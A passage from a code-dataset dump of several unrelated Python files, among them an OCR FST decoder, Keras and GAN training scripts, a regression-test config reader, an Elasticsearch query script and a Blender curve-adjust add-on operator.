wfst.arcs(s):\n if a.olabel > 0: # の id は常に 0\n result.append(wfst.output_symbols().find(a.olabel))\n return ''.join(result)\n\n\n\nif __name__ == '__main__':\n\n lm_file = 'morihirokazu.fst'\n\n d = None\n\n type = 'PyWrapFST'\n #type = 'SolFST'\n\n if type == 'SolFST':\n with open(lm_file, 'w') as lm:\n lm.write('I 0\\n')\n lm.write('T 0 1 \\n')\n lm.write('T 1 2 森 森\\n')\n lm.write('T 2 3 博 博\\n')\n lm.write('T 3 4 一 一\\n')\n lm.write('T 4 5 \\n')\n lm.write('F 5\\n')\n\n d = DecoderSolFST(lm_file)\n elif type == 'PyWrapFST':\n with open('chars.txt', 'w') as c:\n c.write(' 1\\n')\n c.write('森 2\\n')\n c.write('博 3\\n')\n c.write('一 4\\n')\n c.write(' 5\\n')\n c.write('薪 6\\n')\n c.write('萩 7\\n')\n c.write('捜 8\\n')\n c.write('傅 9\\n')\n c.write('- 10\\n')\n c.write('ノ 11\\n')\n os.system('cp chars.txt words.txt')\n\n with open(lm_file, 'w') as lm:\n lm.write('0 1 \\n')\n lm.write('1 2 森 森\\n')\n lm.write('2 3 博 博\\n')\n lm.write('3 4 一 一\\n')\n lm.write('4 5 \\n')\n lm.write('5\\n')\n os.system('fstcompile --isymbols=chars.txt --osymbols=words.txt --keep_isymbols --keep_osymbols {} morihirokazu.bin'.format(lm_file))\n d = DecoderOpenFST('morihirokazu.bin')\n elif type == 'OpenFST':\n print('not yet')\n exit()\n else:\n print('not yet')\n exit()\n\n d.set_output_filename('test-input.fst')\n\n d.set_initial()\n d.add_arc('', '')\n d.increment_state()\n\n d.add_arc('森', '森', 0.05)\n d.add_arc('薪', '薪', 0.15)\n d.add_arc('萩', '萩', 0.18)\n d.increment_state()\n\n d.add_arc('捜', '捜', 0.3)\n d.add_arc('傅', '傅', 0.020)\n d.add_arc('博', '博', 0.024)\n d.increment_state()\n\n d.add_arc('一', '一', 0.18)\n d.add_arc('-', '-', 0.17)\n d.add_arc('ノ', 'ノ', 1.8)\n d.increment_state()\n\n d.add_arc('', '')\n d.increment_state()\n\n d.set_final()\n\n print(d.shortestpath())\n","sub_path":"freepitch改善/追加資材_0719/aiocr_dnn_optical_model/utils/Decoder.py","file_name":"Decoder.py","file_ext":"py","file_size_in_byte":6556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"229792142","text":"\"\"\"\nMulti-gate Mixture-of-Experts demo with census income data.\n\nCopyright (c) 2018 Drawbridge, Inc\nLicensed under the MIT License (see LICENSE for details)\nWritten by Peizhou Liao\n\"\"\"\n\nimport random\n\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras import metrics\nfrom keras.optimizers import Adam\nfrom keras.initializers import VarianceScaling\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras.models import Sequential\nfrom keras.layers import BatchNormalization,Dense, Activation\n\nfrom mmoe import MMoE\n\nimport kerasplt as kp\n\nSEED = 1\n\n# Fix numpy seed for reproducibility\nnp.random.seed(SEED)\n\n# Fix random seed for reproducibility\nrandom.seed(SEED)\n\n# Fix TensorFlow graph-level seed for reproducibility\ntf.set_random_seed(SEED)\ntf_session = tf.Session(graph=tf.get_default_graph())\nK.set_session(tf_session)\n\nimport numpy as np\nfrom datetime import datetime\nimport re\nfrom collections import Counter\n\ndef apache_log_reader(logfile,regex,ts_format):\n data = []\n labels = []\n #labels.append([])\n #labels.append([])\n myregex = regex\n i = 0\n with open(logfile, encoding=\"utf8\", errors='ignore') as f:\n for log in f:\n ts = re.findall(myregex,log)[0]\n dt = datetime.strptime(ts,ts_format)\n #data.append([i,dt.timestamp(),dt.year,dt.month,dt.day,dt.hour,dt.minute,dt.second])\n data.append([float(dt.timestamp())])\n labels.append(i)\n #labels[1].append(i)\n i = i+1\n return data,labels\n\ndef data_preparation():\n #train_data,train_label = apache_log_reader(\"../sdsc-http.txt\",r'[SMTWF][a-z]{2} [JFMASOND][a-z]{2} \\d{2} \\d{2}:\\d{2}:\\d{2} \\d{4}',\"%a %b %d %H:%M:%S %Y\")\n train_data,train_label = apache_log_reader(\"../usask_access_log_50k\",r'\\d{2}/.../\\d{4}\\:\\d{2}\\:\\d{2}\\:\\d{2}',\"%d/%b/%Y:%H:%M:%S\")\n train_data=train_data-np.amin(train_data)\n cols = ['pk']\n train_data = pd.DataFrame.from_records(train_data, columns=cols)\n validation_data, validation_label = train_data,train_label\n test_data, test_label = train_data,train_label\n \n return train_data, train_label, validation_data, validation_label, test_data, test_label\ndef reshape(a):\n aa = []\n aa.append(a)\n return aa \n\ndef data_preparation_moe():\n train_data, train_l, validation_data, validation_l, test_data, test_l = data_preparation()\n\n \n return train_data, reshape(train_l), validation_data, reshape(validation_l), test_data, reshape(test_l)\n\ndef main1():\n # Load the data\n train_data, train_label, validation_data, validation_label, test_data, test_label = data_preparation_moe()\n num_features = train_data.shape[1]\n\n print('Training data shape = {}'.format(train_data.shape))\n print('Validation data shape = {}'.format(validation_data.shape))\n print('Test data shape = {}'.format(test_data.shape))\n \n #print('Training laebl shape = {}'.format(len(train_label)))\n \n \n \n # Set up the input layer\n input_layer = Input(shape=(num_features,))\n\n # Set up MMoE layer\n mmoe_layers = MMoE(\n units=16,\n num_experts=8,\n num_tasks=1\n )(input_layer)\n\n output_layers = []\n\n output_info = ['y0']\n\n print(\"mmoe_layers type is={}\".format(type(mmoe_layers)))\n# for index, task_layer in enumerate(mmoe_layers):\n# print(\"index is ={}\".format(index))\n# print(\"task_layer is ={}\".format(type(task_layer)))\n # Build tower layer from MMoE layer\n #for index, task_layer in enumerate(mmoe_layers):\n tower_layer = Dense(\n units=8,\n activation='relu',\n kernel_initializer=VarianceScaling())(mmoe_layers)\n output_layer = Dense(\n units=1,\n name=output_info[0],\n activation='linear',\n kernel_initializer=VarianceScaling())(tower_layer)\n output_layers.append(output_layer)\n\n # Compile model\n model = Model(inputs=[input_layer], outputs=output_layers)\n learning_rates = [1e-4]\n adam_optimizer = Adam(lr=learning_rates[0])\n model.compile(\n loss={'y0': 'mean_squared_error'},\n optimizer=adam_optimizer,\n metrics=[metrics.mae]\n )\n\n # Print out model architecture summary\n model.summary()\n\n # Train the model\n model.fit(\n x=train_data,\n y=train_label,\n validation_data=(validation_data, validation_label),\n epochs=100\n )\n return model\n\n\ndef main():\n # Load the data\n train_data, train_label, validation_data, validation_label, test_data, test_label = data_preparation()\n num_features = train_data.shape[1]\n\n print('Training222 data shape = {}'.format(train_data.shape))\n print('Validation data shape = {}'.format(validation_data.shape))\n print('Test data shape = {}'.format(test_data.shape))\n\n \n\n # Compile model\n model = Sequential()\n model.add(BatchNormalization(input_shape=(1,)))\n model.add(Dense(10,use_bias=True))\n model.add(Activation('relu'))\n model.add(Dense(1,use_bias=True))\n learning_rates = [1e-4, 1e-3, 1e-2]\n adam_optimizer = Adam(lr=learning_rates[0])\n model.compile(\n loss='mean_absolute_error',\n optimizer=adam_optimizer,\n metrics=[metrics.mae]\n )\n\n # Print out model architecture summary\n model.summary()\n\n # Train the model\n model.fit(\n x=train_data,\n y=train_label,\n validation_data=(validation_data, validation_label),\n epochs=100\n #,callbacks=[kp.plot_losses]\n )\n \n return model\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"webtfkeras.py","file_name":"webtfkeras.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"418559006","text":"# -------------------------------------------------------------------------\n# Name: regression_cfg.py\n# Purpose: read and parse sal_regression.cfg\n#\n# Author: bella_meng\n#\n# Created: 12/08/2015\n# -------------------------------------------------------------------------\nimport os\nimport ConfigParser\nfrom logging import debug as _d\nfrom re import compile\nfrom os.path import join\nfrom pdb import set_trace\n\nclass RegressionConfig(object):\n\n '''\n read sal regression configure file\n '''\n\n def __init__(self, config_file, client=None):\n '''\n init function\n '''\n _d('config_file is {0}'.format(config_file))\n self.config = ConfigParser.ConfigParser()\n self.config.read(config_file)\n self.work_dir = self.getWorkDir()\n self.client = client\n\n @property\n def final_cfg(self):\n return join(self.cfg.get('controller', 'client_dir'), 'final.cfg')\n\n @property\n def builds_dir(self):\n return self.cfg.get('controller', 'build_dir')\n\n @property\n def buildinfo_path(self):\n return join(self.builds_dir, 'buildinfo.json')\n\n @property\n def cfg(self):\n return self.config\n\n @property\n def client_work_dir(self):\n try:\n return self.cfg.get(self.client, 'work_dir')\n except ConfigParser.Error:\n return self.cfg.get('client', 'work_dir')\n\n @property\n def client_createlst_path(self):\n return join(self.client_work_dir, 'utils', 'createlst.py')\n\n @property\n def client_start_script(self):\n try:\n return self.cfg.get(self.client, 'test_script')\n except ConfigParser.Error:\n return self.cfg.get('client', 'test_script')\n\n @property\n def client_data_dir(self):\n try:\n return self.cfg.get(self.client, 'data_dir')\n except ConfigParser.Error:\n return self.cfg.get('client', 'data_dir')\n\n @property\n def client_src_dir(self):\n try:\n return self.cfg.get(self.client, 'src_dir')\n except ConfigParser.Error:\n return self.cfg.get('client', 'src_dir')\n\n def getWorkDir(self):\n '''\n get controller work_dir, it could be defined in environment variable\n CWD or the current working directory\n '''\n work_dir = os.environ.get('CWD', None)\n if work_dir is None:\n work_dir = os.getcwd()\n return work_dir\n\n def getLocalBuildDir(self):\n '''\n get controller local build dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_dir\"))\n return local_build_dir\n\n def getLocalBuildDir_32(self):\n '''\n get controller local 32 build storage dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_dir_32\"))\n return local_build_dir\n\n def getLocalBuildDir_64(self):\n '''\n get controller local 64 build storage dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_dir_64\"))\n return local_build_dir\n\n def getLocalBuildOK_32(self):\n '''\n get controller unzipped local 32 build ok dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_32_ok\"))\n return local_build_dir\n\n def getLocalBuildOK_64(self):\n '''\n get controller unzipped local 64 build ok dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_64_ok\"))\n return local_build_dir\n\n def getLocalBuildInfo(self):\n '''\n get controller local build info\n '''\n local_build_info = {\n \"local_build_dir\": self.getLocalBuildDir(),\n \"local_build_dir_32\": self.getLocalBuildDir_32(),\n \"local_build_dir_64\": self.getLocalBuildDir_64(),\n \"local_build_32_ok\": self.getLocalBuildOK_32(),\n \"local_build_64_ok\": self.getLocalBuildOK_64()}\n return local_build_info\n\n def getLocalPatternDir(self):\n '''\n get controller local pattern dir\n '''\n local_pattern_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_pattern_dir\"))\n return local_pattern_dir\n\n def getLocalPatternOKDir(self):\n '''\n get controller local pattern unzipped dir\n '''\n local_pattern_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_pattern_ok\"))\n return local_pattern_dir\n\n def getLocalPatternInfo(self):\n '''\n get controller local pattern info\n '''\n local_pattern_info = {\"local_pattern_dir\": self.getLocalPatternDir(\n ), \"local_pattern_ok\": self.getLocalPatternOKDir()}\n return local_pattern_info\n\n def getResultDir(self):\n '''\n get controller result dir\n '''\n result_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"result_dir\"))\n return result_dir\n\n def getBuildInfo(self):\n '''\n get build info dict\n '''\n build_version = self.config.get(\"build\", \"build_version\") # deperated\n build_path = self.config.get(\"build\", \"build_path\")\n build_path_32 = os.path.join(build_path, build_version, \"win32\")\n build_path_64 = os.path.join(build_path, build_version, \"win64\")\n build_paths = [p[1] for p in self.config.items('build_paths')]\n build_filters = self.config.get('build', 'filters').split(',')\n version = self.config.get('build', 'version')\n build_suffix_path = self.config.get('build', 'build_suffix_path')\n\n return {\"build_path\": build_path,\n \"build_path_32\": build_path_32,\n \"build_path_64\": build_path_64,\n \"build_version\": build_version,\n \"build_paths\": build_paths,\n 'filters': build_filters,\n 'version': version,\n 'suffix_path': build_suffix_path}\n\n def getPatternInfo(self):\n '''\n get Pattern info dict\n '''\n pattern_path = self.config.get(\"pattern\", \"pattern_path\")\n pattern_name = self.config.get(\"pattern\", \"pattern_name\")\n pat = compile(r'\\d+(\\.\\d+)*')\n m = pat.search(pattern_name)\n pattern_version = m.group()\n return {\"pattern_path\": pattern_path,\n \"pattern_version\": pattern_version,\n \"pattern_name\": pattern_name}\n\n def getEmailFrom(self):\n '''\n get email from info\n '''\n email_from = self.config.get(\"email\", \"from\")\n return email_from\n\n def getEmailTo(self):\n '''\n get email to info\n '''\n emailto_str = self.config.get(\"email\", \"to\")\n emailto_list = emailto_str.strip(\",\").split(\",\")\n return emailto_list\n\n def getClientGroupInfo(self):\n '''\n get ClientGroup info\n '''\n clientgroup_str = self.config.get(\"controller\", \"client_group\")\n client_list = clientgroup_str.strip(\",\").split(\",\")\n return client_list\n\n def getVIXWorkDir(self):\n '''\n get vmware vix work dir\n '''\n vix_dir = self.config.get(\"controller\", \"vix_dir\")\n return vix_dir\n\n\n def getProductname(self):\n '''\n get test product name info\n '''\n productname = self.config.get(\n \"test_info\", \"productname\").lower().strip()\n return productname\n\n def getWorkClientGroupInfo(self):\n '''\n get Working ClientGroup info\n '''\n clientgroup_str = self.config.get(\"test_info\", \"work_client_group\")\n client_list = clientgroup_str.strip(\",\").split(\",\")\n return client_list\n\n def isRevertNeeded(self):\n '''\n if need revert vm\n '''\n r = self.config.get(\"test_info\", \"need_revert\")\n if r.strip()==\"0\":\n return False\n else:\n return True\n\n def getClientIp(self, client):\n '''\n get client ip\n '''\n IP = self.config.get(client, \"IP\")\n return IP\n\n def getEsxiServerInfo(self):\n '''\n get esxi server info\n '''\n h = self.config.get(\"esxi_server\", \"host\")\n u = self.config.get(\"esxi_server\", \"user\")\n p = self.config.get(\"esxi_server\", \"pwd\")\n srv_info = {\"host\": h, \"user\":u, \"pwd\":p}\n return srv_info\n\n def getClientVMInfo(self, client):\n '''\n get client vm path and snapshot\n '''\n try:\n p = self.config.get(client, \"vm_path\")\n s = self.config.get(client, \"vm_snapshot\")\n except:\n return None\n vm_info = {\"path\": p, \"snapshot\":s}\n return vm_info\n \n\n def getControllerIp(self, client):\n '''\n get controller ip\n '''\n IP = self.config.get(client, \"controller\")\n return IP\n\n def getClientInfoDict(self, client):\n '''\n get client info dict\n '''\n Type = self.config.get(client, \"type\")\n IP = self.config.get(client, \"IP\")\n work_dir = self.client_work_dir\n controller = self.config.get(client, \"controller\")\n # set_trace()\n build_dir = os.path.join(work_dir, self.config.get(\n client, \"build_dir\"))\n result_dir = os.path.join(work_dir, self.config.get(\n client, \"result_dir\"))\n src_dir = os.path.join(work_dir, self.client_src_dir)\n data_dir = os.path.join(work_dir, self.client_data_dir)\n return {\n \"type\": Type,\n \"IP\": IP,\n \"controller\": controller,\n \"work_dir\": work_dir,\n \"build_dir\": build_dir,\n \"result_dir\": result_dir,\n 'src_dir': src_dir,\n 'data_dir': data_dir\n }\n\n # deperated\n def getClientResult(self):\n '''\n get client result file list\n '''\n result_file_section = r\"result_file_\" + self.getProductname()\n result_file_str = self.config.get(\"test_info\", result_file_section)\n result_file_list = result_file_str.strip(\",\").split(\",\")\n return result_file_list\n\n def getUpdateCaseSrc(self):\n '''\n get update cases src path\n '''\n src = os.path.join(\n self.work_dir, self.config.get(\"update_case\", \"src\"))\n return src\n\n def getUpdateCaseDst(self, client):\n '''\n get update cases dst path\n '''\n dst = os.path.join(\n self.config.get(client, \"work_dir\"),\n self.config.get(\"update_case\", \"dst\"))\n return dst\n","sub_path":"src/utils/regression_cfg.py","file_name":"regression_cfg.py","file_ext":"py","file_size_in_byte":10835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"515627498","text":"import sys\n\nn = sys.stdin.readlines()\n\nwords = []\nfor i in n:\n\ti = i.rstrip('\\n')\n\twords.append(i)\n\ncc = {}\ns = []\nfor i in words:\n\ttotal = 0\n\tdetails = i.split(':')\n\tdetails[1] = details[1].strip()\n\tscore = details[1].split()\n\tfor k in score:\n\t\tif k.isdigit():\n\t\t\ttotal += int(k)\n\t\telse:\n\t\t\ttotal = 0\n\t\t\tbreak\n\t\n\tif total != 0:\n\t\tcc[total] = details[0]\n\t\ts.append(total)\ns = sorted(s)\nm = len(s) - 1\nwhile m >= 0:\n\tprint(cc[s[m]] + ':', s[m], 'points')\n\tm = m - 1\n","sub_path":"programming_2_ca117-master/programming_2_ca117-master/Lab Exam 1/league_61.py","file_name":"league_61.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"588582114","text":"\nimport os\n\nimport numpy as np\nimport pandas as pd\n\n\"\"\"\n\n\tScript for processing and saving UV-data.\n\n\thttp://strang.smhi.se/extraction/index.php\n\tCIE UV irradiance [mW/m^2]\n\tNote that the values are instantaneous and refer to the full hour (UTC). Swedish local time is UTC + 1 h during winter time and UTC + 2 h during the summer.\n\n\"\"\"\n\n\nLOCATION = 'LE'\nLABEL_NAME = 'uv_' + LOCATION\n\nINPUT_DATA_PATH = '../../data/SMHI/Add/uv_daily_Lilla_Edet.txt'\nOUTPUT_DATA_PATH = '../data/cleanedFiles/uv_' + LOCATION + '.csv'\n\nif __name__ == '__main__':\n\n\tdf = pd.read_csv(\n\t\tINPUT_DATA_PATH,\n\t\tsep=' ',\n\t\tskiprows=4,\n\t\tnames=['year', 'month', 'day', 'hour', LABEL_NAME]\n\t)\n\n\tdf['timestamp'] = pd.to_datetime(df[['year', 'month', 'day']])\n\n\tdf = df.drop(\n\t\t[\n\t\t\t'year',\n\t\t\t'month',\n\t\t\t'day',\n\t\t\t'hour'\n\t\t],\n\t\taxis=1\n\t)\n\n\t# Remove -999\n\tdf = df[df[LABEL_NAME] >= 0.0]\n\n\tdf[['timestamp', LABEL_NAME]].to_csv(\n\t\tOUTPUT_DATA_PATH,\n\t\tindex=False\n\t)","sub_path":"waterqualit_pred/waquapred-master/deprecated/preprocessing/process_uv.py","file_name":"process_uv.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"457011429","text":"#!/usr/bin/python\n\nimport elasticsearch\nfrom elasticsearch_dsl import Search, A, Q\n#import logging\nimport operator\nimport sys\nimport os\nimport dateutil.parser as parser\n\n#logging.basicConfig(level=logging.WARN)\n#es = elasticsearch.Elasticsearch(\n# ['https://gracc.opensciencegrid.org/q'],\n# timeout=300, use_ssl=True, verify_certs=False)\nes = elasticsearch.Elasticsearch()\n\nosg_raw_index = 'gracc.osg.raw-*'\nosg_summary_index = 'gracc.osg.summary'\n\nstarttime = parser.parse(\"2021-02-12\")\nendtime = parser.parse(\"2021-03-17\")\n\ns = Search(using=es, index=osg_raw_index)\n\ns = s.query(\"match\", Grid=\"Local\")\ns = s.query(\"match\", ProbeName=\"slurm:hammer-osg.rcac.purdue.edu\")\ns = s.query(Q(\"range\", EndTime={\"gte\": starttime, \"lt\": endtime}))\ns = s.query(~Q(\"exists\", field=\"VOName\"))\nresponse = s.execute()\n\nprint(\"Query took %i milliseconds\" % response.took)\n\nprint(\"Query got %i hits\" % response.hits.total.value)\n#s.delete()\n\n\ns = Search(using=es, index=osg_summary_index)\ns = s.query(\"match\", Grid=\"Local\")\ns = s.query(\"match\", ProbeName=\"slurm:hammer-osg.rcac.purdue.edu\")\ns = s.query(Q(\"range\", EndTime={\"gte\": starttime, \"lt\": endtime}))\ns = s.query(\"match\", VOName=\"N/A\")\n\nresponse = s.execute()\nprint(\"Query took %i milliseconds\" % response.took)\n\nprint(\"Query got %i hits\" % response.hits.total.value)\n#s.delete()\n\n","sub_path":"gracc-oneoffs/remove-purdue-local/remote-purdue-local.py","file_name":"remote-purdue-local.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107828806","text":"import argparse\nimport os\nimport torch\nimport torch.nn.functional as F\nimport torchvision\n\nfrom network import Generator\n\n\nPARSER = argparse.ArgumentParser()\nPARSER.add_argument('--model_file_name',\n default='generator.pth',\n help='The file name of a trained model')\nPARSER.add_argument('--grid_size',\n default='64', type=int,\n help='Grid size -> [1, 64]')\nPARSER.add_argument('--lsv_size',\n default='512', type=int,\n help='Size of latent space vectors')\nargs = PARSER.parse_args()\n\nGRID_SIZE = min(64, max(1, args.grid_size))\nMODEL_PATH = f'trained_models/{args.model_file_name}'\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nSAVE_IMAGE_DIR = f'generated_with_preloaded_models'\n\nif args.grid_size > 1:\n # Save grids to separate directory.\n SAVE_IMAGE_DIR += '/grids'\nelse:\n # Add single images to a dedicated directory to use for evaluation.\n SAVE_IMAGE_DIR += '/1x1'\n\n\nif not os.path.exists(SAVE_IMAGE_DIR):\n os.makedirs(SAVE_IMAGE_DIR)\nIMAGE_NUM_SO_FAR = len(os.listdir(SAVE_IMAGE_DIR))\n\ngenerator_model = Generator().to(DEVICE)\n\ngenerator_model.load_state_dict(torch.load(MODEL_PATH, map_location=DEVICE))\ngenerator_model.eval()\nprint(f'Loaded model \"{MODEL_PATH}\"')\n\n# Create a random batch of latent space vectors.\nfixed_latent_space_vectors = torch.randn([GRID_SIZE, args.lsv_size], device=DEVICE)\n\ngenerated_images = generator_model(fixed_latent_space_vectors).detach()\ngenerated_images = F.interpolate(generated_images, size=(128, 128), mode='nearest')\ntorchvision.utils.save_image(generated_images, f'{SAVE_IMAGE_DIR}/{(IMAGE_NUM_SO_FAR+1):03d}.jpg', padding=2, normalize=True)\nprint(f'Saved image \"{SAVE_IMAGE_DIR}/{(IMAGE_NUM_SO_FAR+1):03d}.jpg\"')\n","sub_path":"generate_images.py","file_name":"generate_images.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"296923060","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom gpar.regression import GPARRegressor\n\nx = np.linspace(0, 1, 100)\nmodel = GPARRegressor(scale=0.1,\n linear=False, nonlinear=True, nonlinear_scale=0.5,\n impute=True, replace=True,\n noise=0.1, normalise_y=True)\n\n# Sample observations and discard some.\ny = model.sample(x, p=3)\ny_obs = y.copy()\ny_obs[np.random.permutation(100)[:25], 0] = np.nan\ny_obs[np.random.permutation(100)[:50], 1] = np.nan\ny_obs[np.random.permutation(100)[:75], 2] = np.nan\n\n# Fit model and predict.\nmodel.fit(x, y)\nmeans, lowers, uppers = \\\n model.predict(x, num_samples=200, latent=False, credible_bounds=True)\n\n# Plot the result.\nplt.figure(figsize=(8, 6))\nplt.rcParams['font.family'] = 'serif'\nplt.rcParams['mathtext.fontset'] = 'dejavuserif'\n\nfor i in range(3):\n ax = plt.subplot(3, 1, i + 1)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.yaxis.set_ticks_position('left')\n ax.xaxis.set_ticks_position('bottom')\n plt.ylabel('Output {}'.format(i + 1))\n plt.scatter(x, y[:, i], label='Truth', c='tab:orange')\n plt.scatter(x, y_obs[:, i], label='Observations', c='black')\n plt.plot(x, means[:, i], label='Prediction', c='tab:blue')\n plt.plot(x, lowers[:, i], c='tab:blue', ls='--')\n plt.plot(x, uppers[:, i], c='tab:blue', ls='--')\n if i == 2:\n leg = plt.legend(facecolor='#eeeeee')\n leg.get_frame().set_linewidth(0)\n\nplt.tight_layout()\nplt.savefig('examples/model_sample_prediction.pdf')\nplt.show()\n","sub_path":"examples/model_sample.py","file_name":"model_sample.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"118460868","text":"'''\nCreated on Jun 12, 2013\n\n@author: Christoph Paulik christoph.paulik@geo.tuwien.ac.at\n'''\n\nfrom validation_tool.iout.db_model import interface\n\n\ndef plot_ascat_data(station_id):\n\n from matplotlib import pyplot as plt\n\n vt_db = interface()\n vt_db.connect()\n\n fig = plt.figure()\n ax = fig.add_axes()\n data = vt_db.get_ascat_data_for_station_id(station_id)\n data['sm'].plot(ax=ax)\n return fig\n\n\ndef plot_era_interim_data(station_id):\n\n from matplotlib import pyplot as plt\n\n vt_db = interface()\n vt_db.connect()\n\n data = vt_db.get_era_interim_data_for_station_id(station_id)\n data.plot(subplots=True)\n plt.show()\n","sub_path":"validation_tool/server/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"30416107","text":"import bpy, math\r\nfrom mathutils import Vector\r\nfrom bpy.props import IntProperty, FloatProperty\r\nfrom . import infobar\r\nfrom ... preferences import get_preferences\r\nfrom ... ui_framework.master import Master\r\nfrom ... ui_framework.utils.mods_list import get_mods_list\r\nfrom ... utility.base_modal_controls import Base_Modal_Controls\r\n\r\n# Cursor Warp imports\r\nfrom ... utils.toggle_view3d_panels import collapse_3D_view_panels\r\nfrom ... utils.modal_frame_drawing import draw_modal_frame\r\nfrom ... utils.cursor_warp import mouse_warp\r\nfrom ... addon.utility import method_handler\r\n\r\n\r\nclass HOPS_OT_AdjustCurveOperator(bpy.types.Operator):\r\n bl_idname = \"hops.adjust_curve\"\r\n bl_label = \"Adjust Curve\"\r\n bl_description = \"Interactive Curve adjustment. 1/2/3 provides presets for curves\"\r\n bl_options = {\"REGISTER\", \"UNDO\", \"BLOCKING\"}\r\n\r\n first_mouse_x: IntProperty()\r\n first_value: FloatProperty()\r\n second_value: IntProperty()\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n return getattr(context.active_object, \"type\", \"\") == \"CURVE\"\r\n\r\n\r\n def invoke(self, context, event):\r\n\r\n self.back_dict = {}\r\n self.active_curve = context.active_object\r\n \r\n if self.active_curve:\r\n self.active_curve.select_set(True)\r\n\r\n self.slected_curves = [c for c in context.selected_objects if c.type == 'CURVE' and c.data.splines]\r\n self.back_objects() \r\n self.master = None\r\n\r\n self.fill_type_3d = [\"FULL\", \"BACK\", \"FRONT\", \"HALF\"]\r\n self.fill_type_2d = [\"NONE\", \"BACK\", \"FRONT\", \"BOTH\"] \r\n self.spline_type = [\"POLY\", \"NURBS\", \"BEZIER\"]\r\n\r\n if not self.active_curve or not self.active_curve.data.splines:\r\n if self.slected_curves:\r\n self.active_curve = self.slected_curves[0]\r\n\r\n else:\r\n\r\n self.active_curve = None\r\n \r\n if self.active_curve:\r\n \r\n if not self.active_curve.data.splines.active:\r\n self.active_curve.data.splines.active = self.active_curve.data.splines[0]\r\n\r\n self.start_fill_mode = self.active_curve.data.fill_mode\r\n self.start_spline_type = self.active_curve.data.splines.active.type\r\n self.spline_type_index = self.spline_type.index(self.start_spline_type) \r\n self.fill_index = self.fill_type_3d.index(self.start_fill_mode) if self.active_curve.data.dimensions == '3D' else self.fill_type_2d.index(self.start_fill_mode)\r\n self.start_show_wire = self.active_curve.show_wire\r\n # Base Systems\r\n self.master = Master(context=context)\r\n self.master.only_use_fast_ui = True\r\n self.base_controls = Base_Modal_Controls(context, event)\r\n self.original_tool_shelf, self.original_n_panel = collapse_3D_view_panels()\r\n self.draw_handle = bpy.types.SpaceView3D.draw_handler_add(self.safe_draw_shader, (context,), 'WINDOW', 'POST_PIXEL')\r\n\r\n\r\n context.window_manager.modal_handler_add(self)\r\n infobar.initiate(self)\r\n return {\"RUNNING_MODAL\"}\r\n\r\n else:\r\n self.report({'WARNING'}, \"No valid curve objects in selection, could not finish\")\r\n return {'CANCELLED'}\r\n\r\n\r\n def modal(self, context, event):\r\n\r\n # Base Systems\r\n self.master.receive_event(event=event)\r\n self.base_controls.update(context, event)\r\n mouse_warp(context, event)\r\n\r\n if self.base_controls.pass_through:\r\n return {'PASS_THROUGH'}\r\n\r\n if self.base_controls.mouse:\r\n for curve in self.slected_curves:\r\n curve.data.bevel_depth += self.base_controls.mouse\r\n\r\n if self.base_controls.scroll:\r\n #bevel res\r\n if event.ctrl :\r\n for curve in self.slected_curves:\r\n curve.data.resolution_u += self.base_controls.scroll\r\n curve.data.render_resolution_u = curve.data.resolution_u\r\n self.report({'INFO'}, F'Curve Resolution : {self.active_curve.data.resolution_u}')\r\n #curve order\r\n elif event.shift :\r\n for curve in self.slected_curves:\r\n self.splines_add(curve.data.splines, \"order_u\", self.base_controls.scroll)# spline.order_u += self.base_controls.scroll\r\n self.report({'INFO'}, F'Spline order:{self.active_curve.data.splines.active.order_u }')\r\n #bevel res\r\n else:\r\n for curve in self.slected_curves:\r\n curve.data.bevel_resolution += self.base_controls.scroll\r\n self.report({'INFO'}, F'Curve Bevel Resolution : {self.active_curve.data.bevel_resolution}')\r\n\r\n if event.type == 'S' and event.value == 'PRESS':\r\n\r\n if not event.shift:\r\n for curve in self.slected_curves:\r\n for spline in curve.data.splines:\r\n spline.use_smooth = not spline.use_smooth\r\n smooth = self.active_curve.data.splines.active.use_smooth\r\n shade ={True:\"Smooth\", False:\"Flat\"}\r\n self.report({'INFO'}, F'Shade {shade[smooth]}')\r\n else:\r\n use_smooth = self.active_curve.data.splines.active.use_smooth\r\n for curve in self.slected_curves:\r\n self.splines_set(curve.data.splines, \"use_smooth\", use_smooth) \r\n self.report({'INFO'}, F'Shading Synced')\r\n\r\n edgeSplit = [mod.name for mod in self.active_curve.modifiers if mod.type == 'EDGE_SPLIT']\r\n\r\n if event.type == 'C' and event.value == 'PRESS':\r\n for curve in 